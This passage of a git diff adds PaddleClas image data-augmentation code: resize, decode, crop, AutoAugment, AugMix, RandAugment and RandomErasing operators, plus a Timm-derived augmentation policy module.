+""" + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +from __future__ import unicode_literals + +from functools import partial +import six +import math +import random +import cv2 +import numpy as np +from PIL import Image +from paddle.vision.transforms import ColorJitter as RawColorJitter + +from .autoaugment import ImageNetPolicy +from .functional import augmentations +from ppcls.utils import logger + + +class UnifiedResize(object): + def __init__(self, interpolation=None, backend="cv2"): + _cv2_interp_from_str = { + 'nearest': cv2.INTER_NEAREST, + 'bilinear': cv2.INTER_LINEAR, + 'area': cv2.INTER_AREA, + 'bicubic': cv2.INTER_CUBIC, + 'lanczos': cv2.INTER_LANCZOS4 + } + _pil_interp_from_str = { + 'nearest': Image.NEAREST, + 'bilinear': Image.BILINEAR, + 'bicubic': Image.BICUBIC, + 'box': Image.BOX, + 'lanczos': Image.LANCZOS, + 'hamming': Image.HAMMING + } + + def _pil_resize(src, size, resample): + pil_img = Image.fromarray(src) + pil_img = pil_img.resize(size, resample) + return np.asarray(pil_img) + + if backend.lower() == "cv2": + if isinstance(interpolation, str): + interpolation = _cv2_interp_from_str[interpolation.lower()] + # compatible with opencv < version 4.4.0 + elif not interpolation: + interpolation = cv2.INTER_LINEAR + self.resize_func = partial(cv2.resize, interpolation=interpolation) + elif backend.lower() == "pil": + if isinstance(interpolation, str): + interpolation = _pil_interp_from_str[interpolation.lower()] + self.resize_func = partial(_pil_resize, resample=interpolation) + else: + logger.warning( + f"The backend of Resize only support \"cv2\" or \"PIL\". \"f{backend}\" is unavailable. Use \"cv2\" instead." 
+ ) + self.resize_func = cv2.resize + + def __call__(self, src, size): + return self.resize_func(src, size) + + +class OperatorParamError(ValueError): + """ OperatorParamError + """ + pass + + +class DecodeImage(object): + """ decode image """ + + def __init__(self, to_rgb=True, to_np=False, channel_first=False): + self.to_rgb = to_rgb + self.to_np = to_np # to numpy + self.channel_first = channel_first # only enabled when to_np is True + + def __call__(self, img): + if six.PY2: + assert type(img) is str and len( + img) > 0, "invalid input 'img' in DecodeImage" + else: + assert type(img) is bytes and len( + img) > 0, "invalid input 'img' in DecodeImage" + data = np.frombuffer(img, dtype='uint8') + img = cv2.imdecode(data, 1) + if self.to_rgb: + assert img.shape[2] == 3, 'invalid shape of image[%s]' % ( + img.shape) + img = img[:, :, ::-1] + + if self.channel_first: + img = img.transpose((2, 0, 1)) + + return img + + +class ResizeImage(object): + """ resize image """ + + def __init__(self, + size=None, + resize_short=None, + interpolation=None, + backend="cv2"): + if resize_short is not None and resize_short > 0: + self.resize_short = resize_short + self.w = None + self.h = None + elif size is not None: + self.resize_short = None + self.w = size if type(size) is int else size[0] + self.h = size if type(size) is int else size[1] + else: + raise OperatorParamError("invalid params for ReisizeImage for '\ + 'both 'size' and 'resize_short' are None") + + self._resize_func = UnifiedResize( + interpolation=interpolation, backend=backend) + + def __call__(self, img): + img_h, img_w = img.shape[:2] + if self.resize_short is not None: + percent = float(self.resize_short) / min(img_w, img_h) + w = int(round(img_w * percent)) + h = int(round(img_h * percent)) + else: + w = self.w + h = self.h + return self._resize_func(img, (w, h)) + + +class CropImage(object): + """ crop image """ + + def __init__(self, size): + if type(size) is int: + self.size = (size, size) + else: + 
class AutoAugment(object):
    """Apply a random AutoAugment ImageNet sub-policy to an HWC ndarray."""

    def __init__(self):
        self.policy = ImageNetPolicy()

    def __call__(self, img):
        """Augment ``img`` and return the result as an ndarray.

        Fix: the original dropped the result (the method implicitly
        returned None), breaking any transform pipeline placed after
        this operator.
        """
        from PIL import Image
        # Image.fromarray requires C-contiguous memory.
        img = np.ascontiguousarray(img)
        img = Image.fromarray(img)
        img = self.policy(img)
        img = np.asarray(img)
        return img
+ """ + + def __init__(self, + prob=0.5, + aug_prob_coeff=0.1, + mixture_width=3, + mixture_depth=1, + aug_severity=1): + """ + Args: + prob: Probability of taking augmix + aug_prob_coeff: Probability distribution coefficients. + mixture_width: Number of augmentation chains to mix per augmented example. + mixture_depth: Depth of augmentation chains. -1 denotes stochastic depth in [1, 3]' + aug_severity: Severity of underlying augmentation operators (between 1 to 10). + """ + # fmt: off + self.prob = prob + self.aug_prob_coeff = aug_prob_coeff + self.mixture_width = mixture_width + self.mixture_depth = mixture_depth + self.aug_severity = aug_severity + self.augmentations = augmentations + # fmt: on + + def __call__(self, image): + """Perform AugMix augmentations and compute mixture. + Returns: + mixed: Augmented and mixed image. + """ + if random.random() > self.prob: + # Avoid the warning: the given NumPy array is not writeable + return np.asarray(image).copy() + + ws = np.float32( + np.random.dirichlet([self.aug_prob_coeff] * self.mixture_width)) + m = np.float32( + np.random.beta(self.aug_prob_coeff, self.aug_prob_coeff)) + + # image = Image.fromarray(image) + mix = np.zeros([image.shape[1], image.shape[0], 3]) + for i in range(self.mixture_width): + image_aug = image.copy() + image_aug = Image.fromarray(image_aug) + depth = self.mixture_depth if self.mixture_depth > 0 else np.random.randint( + 1, 4) + for _ in range(depth): + op = np.random.choice(self.augmentations) + image_aug = op(image_aug, self.aug_severity) + mix += ws[i] * np.asarray(image_aug) + + mixed = (1 - m) * image + m * mix + return mixed.astype(np.uint8) + + +class ColorJitter(RawColorJitter): + """ColorJitter. 
+ """ + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def __call__(self, img): + if not isinstance(img, Image.Image): + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + img = super()._apply_image(img) + if isinstance(img, Image.Image): + img = np.asarray(img) + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py new file mode 100644 index 0000000..cca59da --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py @@ -0,0 +1,106 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
# This code is based on https://github.com/heartInsert/randaugment

from PIL import Image, ImageEnhance, ImageOps
import numpy as np
import random


class RandAugment(object):
    """RandAugment (https://arxiv.org/abs/1909.13719).

    Applies `num_layers` uniformly sampled ops per image, each at a fixed
    strength derived from `magnitude` on a 0..`max_level` scale.
    """

    def __init__(self, num_layers=2, magnitude=5, fillcolor=(128, 128, 128)):
        self.num_layers = num_layers
        self.magnitude = magnitude
        self.max_level = 10

        # Concrete per-op argument at this magnitude (fraction of max_level).
        abso_level = self.magnitude / self.max_level
        self.level_map = {
            "shearX": 0.3 * abso_level,
            "shearY": 0.3 * abso_level,
            "translateX": 150.0 / 331 * abso_level,
            "translateY": 150.0 / 331 * abso_level,
            "rotate": 30 * abso_level,
            "color": 0.9 * abso_level,
            "posterize": int(4.0 * abso_level),
            "solarize": 256.0 * abso_level,
            "contrast": 0.9 * abso_level,
            "sharpness": 0.9 * abso_level,
            "brightness": 0.9 * abso_level,
            "autocontrast": 0,
            "equalize": 0,
            "invert": 0
        }

        # from https://stackoverflow.com/questions/5252170/
        # specify-image-filling-color-when-rotating-in-python-with-pil-and-setting-expand
        def rotate_with_fill(img, magnitude):
            # Rotate on an RGBA canvas and composite over a grey fill so the
            # corners exposed by the rotation are filled instead of black.
            rot = img.convert("RGBA").rotate(magnitude)
            return Image.composite(rot,
                                   Image.new("RGBA", rot.size, (128, ) * 4),
                                   rot).convert(img.mode)

        rnd_ch_op = random.choice

        # Each entry takes (PIL image, magnitude) and returns a new PIL image.
        # Sign of shear/translate/enhance deltas is re-randomized per call
        # via rnd_ch_op([-1, 1]).
        self.func = {
            "shearX": lambda img, magnitude: img.transform(
                img.size,
                Image.AFFINE,
                (1, magnitude * rnd_ch_op([-1, 1]), 0, 0, 1, 0),
                Image.BICUBIC,
                fillcolor=fillcolor),
            "shearY": lambda img, magnitude: img.transform(
                img.size,
                Image.AFFINE,
                (1, 0, 0, magnitude * rnd_ch_op([-1, 1]), 1, 0),
                Image.BICUBIC,
                fillcolor=fillcolor),
            "translateX": lambda img, magnitude: img.transform(
                img.size,
                Image.AFFINE,
                (1, 0, magnitude * img.size[0] * rnd_ch_op([-1, 1]), 0, 1, 0),
                fillcolor=fillcolor),
            "translateY": lambda img, magnitude: img.transform(
                img.size,
                Image.AFFINE,
                (1, 0, 0, 0, 1, magnitude * img.size[1] * rnd_ch_op([-1, 1])),
                fillcolor=fillcolor),
            "rotate": lambda img, magnitude: rotate_with_fill(img, magnitude),
            "color": lambda img, magnitude: ImageEnhance.Color(img).enhance(
                1 + magnitude * rnd_ch_op([-1, 1])),
            "posterize": lambda img, magnitude:
            ImageOps.posterize(img, magnitude),
            "solarize": lambda img, magnitude:
            ImageOps.solarize(img, magnitude),
            "contrast": lambda img, magnitude:
            ImageEnhance.Contrast(img).enhance(
                1 + magnitude * rnd_ch_op([-1, 1])),
            "sharpness": lambda img, magnitude:
            ImageEnhance.Sharpness(img).enhance(
                1 + magnitude * rnd_ch_op([-1, 1])),
            "brightness": lambda img, magnitude:
            ImageEnhance.Brightness(img).enhance(
                1 + magnitude * rnd_ch_op([-1, 1])),
            "autocontrast": lambda img, magnitude:
            ImageOps.autocontrast(img),
            "equalize": lambda img, magnitude: ImageOps.equalize(img),
            "invert": lambda img, magnitude: ImageOps.invert(img)
        }

    def __call__(self, img):
        # Chain `num_layers` uniformly sampled ops over the PIL image.
        avaiable_op_names = list(self.level_map.keys())
        for layer_num in range(self.num_layers):
            op_name = np.random.choice(avaiable_op_names)
            img = self.func[op_name](img, self.level_map[op_name])
        return img
diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py
new file mode 100644
index 0000000..f234abb
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py
@@ -0,0 +1,90 @@
+# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
#This code is adapted from https://github.com/zhunzhong07/Random-Erasing, and refer to Timm.

from functools import partial

import math
import random

import numpy as np


class Pixels(object):
    """Fill-value generator used by RandomErasing.

    mode "const": the fixed per-channel `mean`;
    mode "rand" : one random RGB value for the whole patch, shape (1, 1, 3);
    mode "pixel": an independent random value per pixel, shape (h, w, c).
    """

    def __init__(self, mode="const", mean=[0., 0., 0.]):
        self._mode = mode
        self._mean = mean

    def __call__(self, h=224, w=224, c=3):
        if self._mode == "rand":
            # NOTE: always 3 channels here regardless of `c`.
            return np.random.normal(size=(1, 1, 3))
        elif self._mode == "pixel":
            return np.random.normal(size=(h, w, c))
        elif self._mode == "const":
            return self._mean
        else:
            raise Exception(
                "Invalid mode in RandomErasing, only support \"const\", \"rand\", \"pixel\""
            )


class RandomErasing(object):
    """RandomErasing.

    With probability EPSILON, overwrite one random rectangle of an HWC
    ndarray (area fraction in [sl, sh], aspect ratio in [r1, 1/r1]) with
    values produced by `Pixels`. The input array is modified in place.
    """

    def __init__(self,
                 EPSILON=0.5,
                 sl=0.02,
                 sh=0.4,
                 r1=0.3,
                 mean=[0., 0., 0.],
                 attempt=100,
                 use_log_aspect=False,
                 mode='const'):
        # NOTE(review): config values may arrive as strings and are eval'd
        # here; eval on untrusted config is unsafe — presumably these come
        # only from local YAML configs, verify before exposing externally.
        self.EPSILON = eval(EPSILON) if isinstance(EPSILON, str) else EPSILON
        self.sl = eval(sl) if isinstance(sl, str) else sl
        self.sh = eval(sh) if isinstance(sh, str) else sh
        r1 = eval(r1) if isinstance(r1, str) else r1
        # Aspect-ratio sampling bounds; stored in log space when
        # use_log_aspect is set (and exp'd back in __call__).
        self.r1 = (math.log(r1), math.log(1 / r1)) if use_log_aspect else (
            r1, 1 / r1)
        self.use_log_aspect = use_log_aspect
        self.attempt = attempt
        self.get_pixels = Pixels(mode, mean)

    def __call__(self, img):
        if random.random() > self.EPSILON:
            return img

        # Rejection-sample a box that fits; give up after `attempt` tries.
        for _ in range(self.attempt):
            area = img.shape[0] * img.shape[1]

            target_area = random.uniform(self.sl, self.sh) * area
            aspect_ratio = random.uniform(*self.r1)
            if self.use_log_aspect:
                aspect_ratio = math.exp(aspect_ratio)

            h = int(round(math.sqrt(target_area * aspect_ratio)))
            w = int(round(math.sqrt(target_area / aspect_ratio)))

            if w < img.shape[1] and h < img.shape[0]:
                pixels = self.get_pixels(h, w, img.shape[2])
                x1 = random.randint(0, img.shape[0] - h)
                y1 = random.randint(0, img.shape[1] - w)
                if img.shape[2] == 3:
                    img[x1:x1 + h, y1:y1 + w, :] = pixels
                else:
                    # Non-3-channel input: only the first channel is erased.
                    img[x1:x1 + h, y1:y1 + w, 0] = pixels[0]
                return img
        return img
diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py
new file mode 100644
index 0000000..2c9b057
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py
@@ -0,0 +1,879 @@
+# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
"""
This implementation is borrowed from Timm: https://github.com/rwightman/pytorch-image-models.
hacked together by / Copyright 2020 Ross Wightman
"""

import random
import math
import re
from PIL import Image, ImageOps, ImageEnhance, ImageChops
import PIL
import numpy as np

IMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)

# (major, minor) of the installed Pillow, used for API compatibility shims.
_PIL_VER = tuple([int(x) for x in PIL.__version__.split('.')[:2]])

_FILL = (128, 128, 128)

# This signifies the max integer that the controller RNN could predict for the
# augmentation scheme.
_MAX_LEVEL = 10.

_HPARAMS_DEFAULT = dict(
    translate_const=250,
    img_mean=_FILL, )

_RANDOM_INTERPOLATION = (Image.BILINEAR, Image.BICUBIC)


def _pil_interp(method):
    # Map an interpolation name to the corresponding PIL resampling constant.
    if method == 'bicubic':
        return Image.BICUBIC
    elif method == 'lanczos':
        return Image.LANCZOS
    elif method == 'hamming':
        return Image.HAMMING
    else:
        # default bilinear, do we want to allow nearest?
+ return Image.BILINEAR + + +def _interpolation(kwargs): + interpolation = kwargs.pop('resample', Image.BILINEAR) + if isinstance(interpolation, (list, tuple)): + return random.choice(interpolation) + else: + return interpolation + + +def _check_args_tf(kwargs): + if 'fillcolor' in kwargs and _PIL_VER < (5, 0): + kwargs.pop('fillcolor') + kwargs['resample'] = _interpolation(kwargs) + + +def shear_x(img, factor, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, factor, 0, 0, 1, 0), + **kwargs) + + +def shear_y(img, factor, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, factor, 1, 0), + **kwargs) + + +def translate_x_rel(img, pct, **kwargs): + pixels = pct * img.size[0] + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, pixels, 0, 1, 0), + **kwargs) + + +def translate_y_rel(img, pct, **kwargs): + pixels = pct * img.size[1] + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, 0, 1, pixels), + **kwargs) + + +def translate_x_abs(img, pixels, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, pixels, 0, 1, 0), + **kwargs) + + +def translate_y_abs(img, pixels, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, 0, 1, pixels), + **kwargs) + + +def rotate(img, degrees, **kwargs): + _check_args_tf(kwargs) + if _PIL_VER >= (5, 2): + return img.rotate(degrees, **kwargs) + elif _PIL_VER >= (5, 0): + w, h = img.size + post_trans = (0, 0) + rotn_center = (w / 2.0, h / 2.0) + angle = -math.radians(degrees) + matrix = [ + round(math.cos(angle), 15), + round(math.sin(angle), 15), + 0.0, + round(-math.sin(angle), 15), + round(math.cos(angle), 15), + 0.0, + ] + + def transform(x, y, matrix): + (a, b, c, d, e, f) = matrix + return a * x + b * y + c, d * x + e * y + f + + matrix[2], matrix[5] = transform(-rotn_center[0] - post_trans[0], + -rotn_center[1] - post_trans[1], 
+ matrix) + matrix[2] += rotn_center[0] + matrix[5] += rotn_center[1] + return img.transform(img.size, Image.AFFINE, matrix, **kwargs) + else: + return img.rotate(degrees, resample=kwargs['resample']) + + +def auto_contrast(img, **__): + return ImageOps.autocontrast(img) + + +def invert(img, **__): + return ImageOps.invert(img) + + +def equalize(img, **__): + return ImageOps.equalize(img) + + +def solarize(img, thresh, **__): + return ImageOps.solarize(img, thresh) + + +def solarize_add(img, add, thresh=128, **__): + lut = [] + for i in range(256): + if i < thresh: + lut.append(min(255, i + add)) + else: + lut.append(i) + if img.mode in ("L", "RGB"): + if img.mode == "RGB" and len(lut) == 256: + lut = lut + lut + lut + return img.point(lut) + else: + return img + + +def posterize(img, bits_to_keep, **__): + if bits_to_keep >= 8: + return img + return ImageOps.posterize(img, bits_to_keep) + + +def contrast(img, factor, **__): + return ImageEnhance.Contrast(img).enhance(factor) + + +def color(img, factor, **__): + return ImageEnhance.Color(img).enhance(factor) + + +def brightness(img, factor, **__): + return ImageEnhance.Brightness(img).enhance(factor) + + +def sharpness(img, factor, **__): + return ImageEnhance.Sharpness(img).enhance(factor) + + +def _randomly_negate(v): + """With 50% prob, negate the value""" + return -v if random.random() > 0.5 else v + + +def _rotate_level_to_arg(level, _hparams): + # range [-30, 30] + level = (level / _MAX_LEVEL) * 30. + level = _randomly_negate(level) + return level, + + +def _enhance_level_to_arg(level, _hparams): + # range [0.1, 1.9] + return (level / _MAX_LEVEL) * 1.8 + 0.1, + + +def _enhance_increasing_level_to_arg(level, _hparams): + # the 'no change' level is 1.0, moving away from that towards 0. 
or 2.0 increases the enhancement blend + # range [0.1, 1.9] + level = (level / _MAX_LEVEL) * .9 + level = 1.0 + _randomly_negate(level) + return level, + + +def _shear_level_to_arg(level, _hparams): + # range [-0.3, 0.3] + level = (level / _MAX_LEVEL) * 0.3 + level = _randomly_negate(level) + return level, + + +def _translate_abs_level_to_arg(level, hparams): + translate_const = hparams['translate_const'] + level = (level / _MAX_LEVEL) * float(translate_const) + level = _randomly_negate(level) + return level, + + +def _translate_rel_level_to_arg(level, hparams): + # default range [-0.45, 0.45] + translate_pct = hparams.get('translate_pct', 0.45) + level = (level / _MAX_LEVEL) * translate_pct + level = _randomly_negate(level) + return level, + + +def _posterize_level_to_arg(level, _hparams): + # As per Tensorflow TPU EfficientNet impl + # range [0, 4], 'keep 0 up to 4 MSB of original image' + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 4), + + +def _posterize_increasing_level_to_arg(level, hparams): + # As per Tensorflow models research and UDA impl + # range [4, 0], 'keep 4 down to 0 MSB of original image', + # intensity/severity of augmentation increases with level + return 4 - _posterize_level_to_arg(level, hparams)[0], + + +def _posterize_original_level_to_arg(level, _hparams): + # As per original AutoAugment paper description + # range [4, 8], 'keep 4 up to 8 MSB of image' + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 4) + 4, + + +def _solarize_level_to_arg(level, _hparams): + # range [0, 256] + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 256), + + +def _solarize_increasing_level_to_arg(level, _hparams): + # range [0, 256] + # intensity/severity of augmentation increases with level + return 256 - _solarize_level_to_arg(level, _hparams)[0], + + +def _solarize_add_level_to_arg(level, _hparams): + # range [0, 110] + 
return int((level / _MAX_LEVEL) * 110), + + +LEVEL_TO_ARG = { + 'AutoContrast': None, + 'Equalize': None, + 'Invert': None, + 'Rotate': _rotate_level_to_arg, + # There are several variations of the posterize level scaling in various Tensorflow/Google repositories/papers + 'Posterize': _posterize_level_to_arg, + 'PosterizeIncreasing': _posterize_increasing_level_to_arg, + 'PosterizeOriginal': _posterize_original_level_to_arg, + 'Solarize': _solarize_level_to_arg, + 'SolarizeIncreasing': _solarize_increasing_level_to_arg, + 'SolarizeAdd': _solarize_add_level_to_arg, + 'Color': _enhance_level_to_arg, + 'ColorIncreasing': _enhance_increasing_level_to_arg, + 'Contrast': _enhance_level_to_arg, + 'ContrastIncreasing': _enhance_increasing_level_to_arg, + 'Brightness': _enhance_level_to_arg, + 'BrightnessIncreasing': _enhance_increasing_level_to_arg, + 'Sharpness': _enhance_level_to_arg, + 'SharpnessIncreasing': _enhance_increasing_level_to_arg, + 'ShearX': _shear_level_to_arg, + 'ShearY': _shear_level_to_arg, + 'TranslateX': _translate_abs_level_to_arg, + 'TranslateY': _translate_abs_level_to_arg, + 'TranslateXRel': _translate_rel_level_to_arg, + 'TranslateYRel': _translate_rel_level_to_arg, +} + +NAME_TO_OP = { + 'AutoContrast': auto_contrast, + 'Equalize': equalize, + 'Invert': invert, + 'Rotate': rotate, + 'Posterize': posterize, + 'PosterizeIncreasing': posterize, + 'PosterizeOriginal': posterize, + 'Solarize': solarize, + 'SolarizeIncreasing': solarize, + 'SolarizeAdd': solarize_add, + 'Color': color, + 'ColorIncreasing': color, + 'Contrast': contrast, + 'ContrastIncreasing': contrast, + 'Brightness': brightness, + 'BrightnessIncreasing': brightness, + 'Sharpness': sharpness, + 'SharpnessIncreasing': sharpness, + 'ShearX': shear_x, + 'ShearY': shear_y, + 'TranslateX': translate_x_abs, + 'TranslateY': translate_y_abs, + 'TranslateXRel': translate_x_rel, + 'TranslateYRel': translate_y_rel, +} + + +class AugmentOp(object): + def __init__(self, name, prob=0.5, 
magnitude=10, hparams=None): + hparams = hparams or _HPARAMS_DEFAULT + self.aug_fn = NAME_TO_OP[name] + self.level_fn = LEVEL_TO_ARG[name] + self.prob = prob + self.magnitude = magnitude + self.hparams = hparams.copy() + self.kwargs = dict( + fillcolor=hparams['img_mean'] if 'img_mean' in hparams else _FILL, + resample=hparams['interpolation'] + if 'interpolation' in hparams else _RANDOM_INTERPOLATION, ) + + # If magnitude_std is > 0, we introduce some randomness + # in the usually fixed policy and sample magnitude from a normal distribution + # with mean `magnitude` and std-dev of `magnitude_std`. + # NOTE This is my own hack, being tested, not in papers or reference impls. + self.magnitude_std = self.hparams.get('magnitude_std', 0) + + def __call__(self, img): + if self.prob < 1.0 and random.random() > self.prob: + return img + magnitude = self.magnitude + if self.magnitude_std and self.magnitude_std > 0: + magnitude = random.gauss(magnitude, self.magnitude_std) + magnitude = min(_MAX_LEVEL, max(0, magnitude)) # clip to valid range + level_args = self.level_fn( + magnitude, self.hparams) if self.level_fn is not None else tuple() + return self.aug_fn(img, *level_args, **self.kwargs) + + +def auto_augment_policy_v0(hparams): + # ImageNet v0 policy from TPU EfficientNet impl, cannot find a paper reference. 
+ policy = [ + [('Equalize', 0.8, 1), ('ShearY', 0.8, 4)], + [('Color', 0.4, 9), ('Equalize', 0.6, 3)], + [('Color', 0.4, 1), ('Rotate', 0.6, 8)], + [('Solarize', 0.8, 3), ('Equalize', 0.4, 7)], + [('Solarize', 0.4, 2), ('Solarize', 0.6, 2)], + [('Color', 0.2, 0), ('Equalize', 0.8, 8)], + [('Equalize', 0.4, 8), ('SolarizeAdd', 0.8, 3)], + [('ShearX', 0.2, 9), ('Rotate', 0.6, 8)], + [('Color', 0.6, 1), ('Equalize', 1.0, 2)], + [('Invert', 0.4, 9), ('Rotate', 0.6, 0)], + [('Equalize', 1.0, 9), ('ShearY', 0.6, 3)], + [('Color', 0.4, 7), ('Equalize', 0.6, 0)], + [('Posterize', 0.4, 6), ('AutoContrast', 0.4, 7)], + [('Solarize', 0.6, 8), ('Color', 0.6, 9)], + [('Solarize', 0.2, 4), ('Rotate', 0.8, 9)], + [('Rotate', 1.0, 7), ('TranslateYRel', 0.8, 9)], + [('ShearX', 0.0, 0), ('Solarize', 0.8, 4)], + [('ShearY', 0.8, 0), ('Color', 0.6, 4)], + [('Color', 1.0, 0), ('Rotate', 0.6, 2)], + [('Equalize', 0.8, 4), ('Equalize', 0.0, 8)], + [('Equalize', 1.0, 4), ('AutoContrast', 0.6, 2)], + [('ShearY', 0.4, 7), ('SolarizeAdd', 0.6, 7)], + [('Posterize', 0.8, 2), ('Solarize', 0.6, 10) + ], # This results in black image with Tpu posterize + [('Solarize', 0.6, 8), ('Equalize', 0.6, 1)], + [('Color', 0.8, 6), ('Rotate', 0.4, 5)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_v0r(hparams): + # ImageNet v0 policy from TPU EfficientNet impl, with variation of Posterize used + # in Google research implementation (number of bits discarded increases with magnitude) + policy = [ + [('Equalize', 0.8, 1), ('ShearY', 0.8, 4)], + [('Color', 0.4, 9), ('Equalize', 0.6, 3)], + [('Color', 0.4, 1), ('Rotate', 0.6, 8)], + [('Solarize', 0.8, 3), ('Equalize', 0.4, 7)], + [('Solarize', 0.4, 2), ('Solarize', 0.6, 2)], + [('Color', 0.2, 0), ('Equalize', 0.8, 8)], + [('Equalize', 0.4, 8), ('SolarizeAdd', 0.8, 3)], + [('ShearX', 0.2, 9), ('Rotate', 0.6, 8)], + [('Color', 0.6, 1), ('Equalize', 1.0, 2)], + [('Invert', 0.4, 9), ('Rotate', 
0.6, 0)], + [('Equalize', 1.0, 9), ('ShearY', 0.6, 3)], + [('Color', 0.4, 7), ('Equalize', 0.6, 0)], + [('PosterizeIncreasing', 0.4, 6), ('AutoContrast', 0.4, 7)], + [('Solarize', 0.6, 8), ('Color', 0.6, 9)], + [('Solarize', 0.2, 4), ('Rotate', 0.8, 9)], + [('Rotate', 1.0, 7), ('TranslateYRel', 0.8, 9)], + [('ShearX', 0.0, 0), ('Solarize', 0.8, 4)], + [('ShearY', 0.8, 0), ('Color', 0.6, 4)], + [('Color', 1.0, 0), ('Rotate', 0.6, 2)], + [('Equalize', 0.8, 4), ('Equalize', 0.0, 8)], + [('Equalize', 1.0, 4), ('AutoContrast', 0.6, 2)], + [('ShearY', 0.4, 7), ('SolarizeAdd', 0.6, 7)], + [('PosterizeIncreasing', 0.8, 2), ('Solarize', 0.6, 10)], + [('Solarize', 0.6, 8), ('Equalize', 0.6, 1)], + [('Color', 0.8, 6), ('Rotate', 0.4, 5)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_original(hparams): + # ImageNet policy from https://arxiv.org/abs/1805.09501 + policy = [ + [('PosterizeOriginal', 0.4, 8), ('Rotate', 0.6, 9)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + [('PosterizeOriginal', 0.6, 7), ('PosterizeOriginal', 0.6, 6)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Equalize', 0.4, 4), ('Rotate', 0.8, 8)], + [('Solarize', 0.6, 3), ('Equalize', 0.6, 7)], + [('PosterizeOriginal', 0.8, 5), ('Equalize', 1.0, 2)], + [('Rotate', 0.2, 3), ('Solarize', 0.6, 8)], + [('Equalize', 0.6, 8), ('PosterizeOriginal', 0.4, 6)], + [('Rotate', 0.8, 8), ('Color', 0.4, 0)], + [('Rotate', 0.4, 9), ('Equalize', 0.6, 2)], + [('Equalize', 0.0, 7), ('Equalize', 0.8, 8)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Rotate', 0.8, 8), ('Color', 1.0, 2)], + [('Color', 0.8, 8), ('Solarize', 0.8, 7)], + [('Sharpness', 0.4, 7), ('Invert', 0.6, 8)], + [('ShearX', 0.6, 5), ('Equalize', 1.0, 9)], + [('Color', 0.4, 0), ('Equalize', 0.6, 3)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Solarize', 0.6, 5), 
